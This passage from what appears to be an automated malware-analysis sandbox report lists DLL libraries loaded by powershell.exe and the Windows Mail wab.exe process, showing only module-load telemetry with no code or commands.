Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dpapi.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasapi32.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasman.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rtutils.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dhcpcsvc6.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dhcpcsvc.dll | Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: secur32.dll | Jump to behavior |